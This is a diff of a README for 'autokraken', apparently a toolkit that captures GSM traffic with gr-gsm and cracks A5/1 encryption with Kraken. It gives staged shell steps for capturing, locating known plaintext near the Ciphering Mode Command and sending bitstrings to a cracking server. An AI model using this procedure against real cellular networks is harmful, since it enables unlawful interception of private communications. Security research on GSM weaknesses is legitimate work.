leonVrashitov/autokraken/README.md

 ## Introduction

-Check that you don't see much after Cipher Mode Command and get the bitstrings at once

-        wireshark -k -Y 'gsmtap' -i lo & grgsm_decode --cfile=$arfcn.cfile --arfcn=$arfcn --mode=SDCCH8 --timeslot=$slot --subslot=$sub \
-		--print-bursts > $arfcn.cfile.${slot}S

-Also have a look at Timing Advance in case it is not `x00` already.

-You can separate stage 1 and 2 for resp. capturing and cracking.
-Simply send the bitstring file from the former to the latter to proceed.
+You can separate stage 0,1 and 2 for resp. capturing and cracking.
+Simply send the bitstring file from the former to the latter and proceed.

+## Stage 0 - capture and get the cfile(s) ready

+	arfcn=

+	./capture.bash $arfcn

-## Stage 1 - define your known plain-text
+## Stage 1 - define known plain-text frame

 _requires GR-GSM and a cfile_

-Seeking for idle frames
+Extract 0C and find out about the SDCCH timeslot (TODO: and subchannel)

+        cfile=/root/capture/$arfcn.cfile

         cd /root/KRAKEN/autokraken/stage1/
-	arfcn=
-        cfile=/root/capture/$arfcn.cfile
-	ls -lF $cfile

-Extract 0C and find out about the SDCCH timeslot (TODO: and subchannel)

-	./json0C $cfile $arfcn
+	./json0C $arfcn
 	./parse.py 0C $cfile.0C.json

 	slot=1

 Look for idling frames around the Ciphering Mode Command

-	./jsonXS $cfile $arfcn $slot
+	./jsonXS $arfcn $slot

+If you don't find the CMC it might be because there's hopping going on.
+Look closer at the IA and hopping friends in SI1.

+Now seek for the last known idle frame

 	./parse.py XS $cfile.${slot}S.json

 	plainframe=

-Obsolete - produce the burst bitstrings with frame references (it's already there)

-        #./bitstringsXS $cfile $arfcn $slot
-        ls -lF $cfile.${slot}S
+Also have a look at Timing Advance in case it is not `x00` already.

 Eventually send the bitstring file to the Kraken server.

 	scp $cfile.${slot}S kraken:/root/capture/

-## Stage 2 - define your target cipher-text
+## Stage 2 - define the cipher-text frames

 _requires Kraken and the bitstring file_

+	screen -S KRAKEN
 	cd /root/KRAKEN/autokraken/stage2/
 	string=/root/capture/$arfcn.cfile.1S
 	echo $plainframe